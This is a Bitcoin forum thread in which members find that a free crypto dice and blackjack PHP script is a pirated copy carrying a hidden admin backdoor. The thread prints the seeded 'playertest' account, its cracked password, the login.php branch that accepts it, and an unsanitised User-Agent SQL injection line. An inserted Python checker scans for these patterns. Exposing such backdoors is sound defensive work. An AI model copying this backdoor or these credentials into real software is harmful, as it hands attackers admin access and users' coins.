Bitcoin Forum

Bitcoin => Project Development => Topic started by: felinegambler on December 31, 2014, 07:55:18 AM



Title: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: felinegambler on December 31, 2014, 07:55:18 AM
CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack

CryptoDice
https://github.com/felinegambler/CryptoDice

Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across).

Both scripts support all Bitcoin based cryptocurrencies.

If you need help with installation I am more than willing to help you. Please email me at felinegambler@gmail.com

Please Read

Due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

Have Fun!


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: TechnoBibble on December 31, 2014, 09:23:03 AM
CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack (https://github.com/felinegambler/CryptoBlackJack)

CryptoDice
https://github.com/felinegambler/CryptoDice (https://github.com/felinegambler/CryptoDice)

Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across).

Both scripts support all Bitcoin based cryptocurrencies.

if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.com

Please Read

due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

Have Fun!

Thank You for the new release, I will Audit these scripts when I get home from work tonight.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: felinegambler on December 31, 2014, 11:21:48 AM
Thanks. I can assure you there is nothing hidden. It would be good to have an independent audit of the software.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: Muhammed Zakir on December 31, 2014, 11:30:03 AM
Hello! Can you extract the dice-rolling script from this and send it to me? I can give some BTC if you want. :)

   ~~MZ~~


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: LOBSTER on December 31, 2014, 11:32:50 AM
Can you show some screenshots? Before downloading and installing, I want to see it :D

But it's not the script from Johny1976?


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: Muhammed Zakir on December 31, 2014, 11:43:59 AM
But it's not the script from Johny1976?

Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses. :)

   ~~MZ~~


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: LOBSTER on December 31, 2014, 11:54:21 AM
Can you show some screenshots? Before downloading and installing, I want to see it :D

You can use Github for demos. They offer making sites for the Github repos.

But it's not the script from Johny1976?

Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses. :)

   ~~MZ~~

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: felinegambler on December 31, 2014, 12:01:26 PM
It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who can't afford to be scammed out of 1 BTC and then their wallet contents.

Anyway... It's now on github for people to share and distribute freely.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: Sam the Man on December 31, 2014, 12:05:15 PM
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: felinegambler on December 31, 2014, 12:09:48 PM
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week :)

Thank You for your positive feedback.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: elm on December 31, 2014, 12:15:20 PM
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week :)

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor :)


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: felinegambler on December 31, 2014, 12:19:26 PM
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week :)

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor :)

Yeah of course, it's something I started a while back which I've been meaning to finish.

The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.

I will get to work on the Hold'Em game tonight, as personally it's my favorite game.



Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: LOBSTER on December 31, 2014, 12:21:19 PM
It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.

Thanks! Nice work!


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: Muhammed Zakir on December 31, 2014, 12:21:26 PM
Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.

Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it! :)

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Can you please post pics like LOBSTER said? And, please reply to my question. Thanks! :)

   ~~MZ~~


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: felinegambler on December 31, 2014, 12:38:14 PM
Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.

Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it! :)

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Can you please post pics like LOBSTER said? And, please reply to my question. Thanks! :)

   ~~MZ~~

Of course, I will get some pics when I am back home tonight and put them on this thread.

Thanks for the github.io link, I will see if I can upload a demo also.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: elm on December 31, 2014, 12:47:51 PM
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week :)

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor :)

Yeah of course, Its something a started a while back which I been meaning to finish.

The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.

I will get to work on the Hold'Em game tonight, As personally its my favorite game.



Thanks for the good work. May I PM you regarding the holdem? I have my own holdem idea and would like to know if you can/would do it, and I sure wanna pay for it.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: felinegambler on December 31, 2014, 01:13:08 PM
Of course, send me your suggestions. I will see if I can implement them.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: felinegambler on December 31, 2014, 01:39:35 PM
Problem

Whilst installing the blackjack game I have noticed a problem with the login. I wouldn't suggest downloading this until I have fixed it, as it will allow anyone to connect to your admin panel. If you do decide to download this you can rename your admin panel to something else.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: cloverme on December 31, 2014, 04:18:06 PM
I can check out the blackjack script and see if any of jonny's work is in there. The newbie verifications in this thread don't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

Well, that didn't take long.  At least for the blackjack, this is a pirate copy of johny1976's coinjack.

Install from the OP
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }
  $included_=true;
  include __DIR__.'/db_data.php';

  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");
  fwrite($db_file,'$conf_c=true;'."\n");
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>\n");
  fclose($db_file);

Install from official Coinjack:
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }

  $included_=true;
  include __DIR__.'/db_data.php';

  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");
  fwrite($db_file,'$conf_c=true;'."\n");
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>\n");
  fclose($db_file);


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: TechnoBibble on December 31, 2014, 04:24:43 PM
I am also in the process of looking through this script, I agree Downloaders beware of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

If the $_POST variable has any data for "ga_playertest", it allows a login from the "ga_players" table instead of the admin table, which in this case holds our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7") hash is, maybe someone with more experience in cracking passwords would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: LOBSTER on December 31, 2014, 04:25:46 PM
I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

Well, that didn't take long.  At least for the blackjack, this is a pirate copy of johny1976's coinjack.

Install from the OP
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }
  $included_=true;
  include __DIR__.'/db_data.php';

  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");
  fwrite($db_file,'$conf_c=true;'."\n");
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>\n");
  fclose($db_file);

Install from official Coinjack:
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }

  $included_=true;
  include __DIR__.'/db_data.php';

  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");
  fwrite($db_file,'$conf_c=true;'."\n");
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>\n");
  fclose($db_file);

As I said...but he meant that he fixed some bugs.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: elm on December 31, 2014, 04:29:27 PM
I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

are there many open source gambling scripts with backdoors on github?


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: johny1976 on December 31, 2014, 04:31:24 PM

due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.


And it's also copyrighted. Please stop sharing our scripts for free.

SCAMMER

I recommend everyone not to download these backdoored versions of our software. These are not even the latest versions and contain security bugs.

If you buy full license from us, you'll get free lifetime support + updates. See my signature.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: elm on December 31, 2014, 04:36:05 PM
Confused now... where are the backdoors? Who is honest here? What is going on here? I can't code so I can't check. Whom can I trust?


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: LOBSTER on December 31, 2014, 04:37:25 PM
confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

So true...best option: develop your own script!


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: cloverme on December 31, 2014, 04:38:13 PM
As I said...but he meant that he fixed some bugs.

Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not, my advice is to avoid the pirate copy and just buy the script from johny if you want it.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: LOBSTER on December 31, 2014, 04:39:42 PM
As I said...but he meant that he fixed some bugs.

Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not.

At first he should tell us which bugs are in the script and how he fixed it. That would help to trust and retrace.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: TechnoBibble on December 31, 2014, 04:42:12 PM
For Your Information, I have just found a backdoor in /admin/login.php

Please see this post (https://bitcointalk.org/index.php?topic=908996.msg9994462#msg9994462)


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: elm on December 31, 2014, 04:43:10 PM
confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

So true...best option: develop your own script!

I can't code :(( so what should I do?


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: cloverme on December 31, 2014, 04:44:24 PM

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

I do have the licensed game yes, none of that code is in there, so it looks like you found the exploit in scammers attempt.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: johny1976 on December 31, 2014, 04:44:56 PM
confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php

This should help you guys make clear who is the scammer here. :-)


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: cloverme on December 31, 2014, 04:47:24 PM
confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://i.imgur.com/NjX9IW5.png

This should help you guys make clear who is the scammer here. :-)

You posted the same image by accident.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: johny1976 on December 31, 2014, 04:47:43 PM
confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://i.imgur.com/NjX9IW5.png

This should help you guys make clear who is the scammer here. :-)

You posted the same image by accident.

Thank you, corrected.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: redsn0w on December 31, 2014, 04:56:06 PM
Scam accusation against you : https://bitcointalk.org/index.php?topic=909282.0

Please try to resolve it (I've left you a negative trust only for a question of security; when you resolve this situation I will remove it).

Thanks for the attention , have a great day .


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: TechnoBibble on December 31, 2014, 04:58:21 PM
I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: redsn0w on December 31, 2014, 05:00:08 PM
I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0 (https://bitcointalk.org/index.php?topic=909282.0)
Thanks, I've seen it. Now I suggest leaving a negative trust for the OP (for a security reason; it will be removed when the whole situation is clarified).


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: johny1976 on December 31, 2014, 05:02:01 PM
I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0 (https://bitcointalk.org/index.php?topic=909282.0)

johny1976, Do you have a link to your version that I can put in the solution?

https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice

It's also in my signature.



Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: TechnoBibble on December 31, 2014, 05:06:03 PM
I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0 (https://bitcointalk.org/index.php?topic=909282.0)

johny1976, Do you have a link to your version that I can put in the solution?

https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice

It's also in my signature.



lol, did not see in your sig, I tend to ignore them ;)

added to post.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: elm on December 31, 2014, 05:09:54 PM
But to be frank, Johnny has the worst support for his Black Jack script IMO, please see here:
https://bitcointalk.org/index.php?topic=718910.0


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: LilGhost on December 31, 2014, 06:07:56 PM
The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue throughout the script. Frequently the script records the user-agent without sanitizing it first.
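
An added example, not code from the thread or from either project: a small Python triage pass over an install dump and a PHP file that looks for the two findings reported above (the installer-seeded account that login.php consults, and client-controlled input concatenated into a query). The sample inputs are constructed from the snippets quoted in the thread; the `settings` row, the function names and the regexes are assumptions of this example.

```python
import re

# Constructed samples, modelled on the snippets quoted in the thread (trimmed).
SAMPLE_SQL = """
CREATE TABLE `ga_players` (`id` int, `username` varchar(20), `passwd` text, `ga_token` text);
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
INSERT INTO `settings` (`name`, `value`) VALUES ('title', 'Dice');
"""
SAMPLE_PHP = r'''
if (!empty($_POST['ga_playertest'])) {
  $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
  $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");
'''

PW_COL = re.compile(r"pass|pwd", re.I)
INSERT_RE = re.compile(
    r"INSERT\s+INTO\s+`?(\w+)`?\s*\(([^)]*)\)\s*VALUES\s*(.+?);", re.I | re.S)
VALUE_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|([^,\s]+)")  # quoted string or bare token
TAINT_RE = re.compile(
    r"(\w+\s*\(\s*)?\$_(POST|GET|COOKIE|REQUEST|SERVER)\[['\"](\w+)['\"]\]")
AUTH_RE = re.compile(
    r"SELECT\b[^;]*?\bFROM\s+`?(\w+)`?[^;]*?\bWHERE\b[^;]*?`?(\w*(?:pass|pwd)\w*)`?\s*=",
    re.I)


def seeded_credentials(sql):
    """Return (table, row) for every dump row that ships a non-empty password."""
    hits = []
    for table, cols, values in INSERT_RE.findall(sql):
        names = [c.strip(" `\n") for c in cols.split(",")]
        pw_idx = [i for i, n in enumerate(names) if PW_COL.search(n)]
        if not pw_idx:
            continue
        for row in re.findall(r"\(([^()]*)\)", values):
            vals = [quoted or bare for quoted, bare in VALUE_RE.findall(row)]
            if len(vals) == len(names) and any(vals[i] for i in pw_idx):
                hits.append((table, dict(zip(names, vals))))
    return hits


def credential_tables(php):
    """Tables that a SELECT compares a password column against."""
    return sorted({m.group(1) for m in AUTH_RE.finditer(php)})


def raw_client_input(php):
    """Return (line_no, variable) for client-controlled input placed in a
    mysql_query() line with no wrapping call at all. Values wrapped in a
    function (prot(), md5(), ...) are not reported and still need review."""
    hits = []
    for no, line in enumerate(php.splitlines(), 1):
        if "mysql_query" not in line:
            continue
        for wrapper, source, key in TAINT_RE.findall(line):
            # In $_SERVER only the HTTP_* keys come straight from request headers.
            client = source != "SERVER" or key.startswith("HTTP_")
            if client and not wrapper:
                hits.append((no, f"$_{source}['{key}']"))
    return hits


def audit(sql, php):
    """Combine the checks; the last-but-one key is the shape reported in the
    thread: the login code consults a table the installer pre-populates."""
    seeded = seeded_credentials(sql)
    tables = credential_tables(php)
    return {
        "seeded_accounts": [(t, row.get("username", "?")) for t, row in seeded],
        "login_tables": tables,
        "preseeded_login_tables": sorted({t for t, _ in seeded} & set(tables)),
        "raw_client_input": raw_client_input(php),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_SQL, SAMPLE_PHP).items():
        print(f"{key}: {value}")
```

A regex pass like this only narrows down where to read; every reported line, and every wrapped value it skips, still has to be reviewed by hand.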


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: MarkMJ on July 06, 2015, 05:13:47 PM
Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: elm on July 06, 2015, 05:44:14 PM
Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

are those 3 backdoors enough to get my coins?


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: myfirst on July 06, 2015, 06:29:34 PM
The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: johny1976 on July 06, 2015, 08:41:56 PM
The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?

Only this pirated copy, in our (original) version that is protected.


Title: Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts
Post by: ca333 on November 11, 2015, 08:02:02 AM
I am also in the process of looking through this script, I agree Downloaders beware of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

I cracked the md5 hash:

6d2aff483952d904179ca0c8c536a2c7:playertest1

I advise anybody to USE THE ORIGINAL version from johny1976 (https://bitcointalk.org/index.php?action=profile;u=143958) because the posted scripts have many backdoors and they are pirated copies with NO licence...